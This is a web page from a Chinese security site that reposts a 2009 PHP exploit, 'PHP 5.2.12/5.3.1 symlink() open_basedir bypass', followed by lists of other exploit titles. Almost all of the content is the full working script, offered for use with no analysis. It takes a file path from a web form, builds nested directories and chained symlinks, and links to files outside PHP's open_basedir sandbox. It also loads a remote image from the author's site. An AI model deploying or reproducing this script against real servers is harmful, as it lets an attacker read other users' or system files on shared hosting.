首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHP 5.2.12/5.3.1 symlink() open_basedir bypass
来源:http://securityreason.com/ 作者:Arciemowicz 发布时间:2009-12-21  

<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
 exit;

if(!is_writable("."))
 die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
 if(!file_exists($fakedir))
  mkdir($fakedir);
 chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
 if(!empty($hardstyle[$a])){
  if(!file_exists($hardstyle[$a]))
   mkdir($hardstyle[$a]);
  chdir($hardstyle[$a]);
  $as++;
 }
}
$as++;
while($as--)
 chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
 else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PlayMeNow Malformed M3U Playli
·PlayMeNow Malformed M3U Playli
·Mozilla Firefox Location Bar S
·Win32 XP SP3 ShellExecuteA she
·TFTP SERVER Buffer Overflow re
·Linux - setreuid (0,0) & execv
·3Com OfficeConnect ADSL Wirele
·Cisco ASA <= 8.x VPN SSL modul
·VideoCache 1.9.2 vccleaner roo
·Google Picasa 3.5 Local DoS Bu
·Simple PHP Blog <= 0.5.1 Local
·Monkey HTTP Daemon < 0.9.3 Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved